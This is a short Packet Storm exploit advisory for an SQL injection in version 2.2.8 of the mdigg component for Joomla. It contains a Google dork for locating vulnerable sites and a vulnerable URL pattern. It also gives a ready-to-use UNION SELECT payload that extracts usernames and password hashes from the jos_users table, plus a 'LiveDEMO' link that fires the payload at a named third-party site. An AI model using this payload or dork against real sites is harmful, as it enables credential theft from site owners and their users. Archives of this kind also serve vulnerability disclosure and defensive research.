Joomla mdigg Component 2.2.8 SQL Injection

2008-12-31T00:00:00
ID PACKETSTORM:73409
Type packetstorm
Reporter boom3rang
Modified 2008-12-31T00:00:00

Description

                                        
                                            `#############################################################  
Joomla Component com_mdigg(category) SQL-injection vulnerability  
#############################################################  
  
  
###################################################  
#[~] Author : boom3rang   
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.  
#[~] Vulnerability : SQL injection   
#[~] Google Dork : inurl:com_mdigg   
--------------------------------------------------  
#[!] Name : mdigg  
#[!] CreationDate : 10-12-2007  
#[!] Author : Zhigang Lei  
#[!] AuthorEmail : zhigang.lei@gmail.com   
#[!] Version : 2.2.8   
###################################################  
  
Example:  
http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]  
  
  
Exploit:  
-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*  
  
  
LiveDEMO:  
http://demo15.joomlaapps.com/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*  
  
##############################  
#[!] Proud 2 be Albanian  
#[!] Proud 2 be Muslim  
#[!] United States of Albania  
##############################  
  
  
`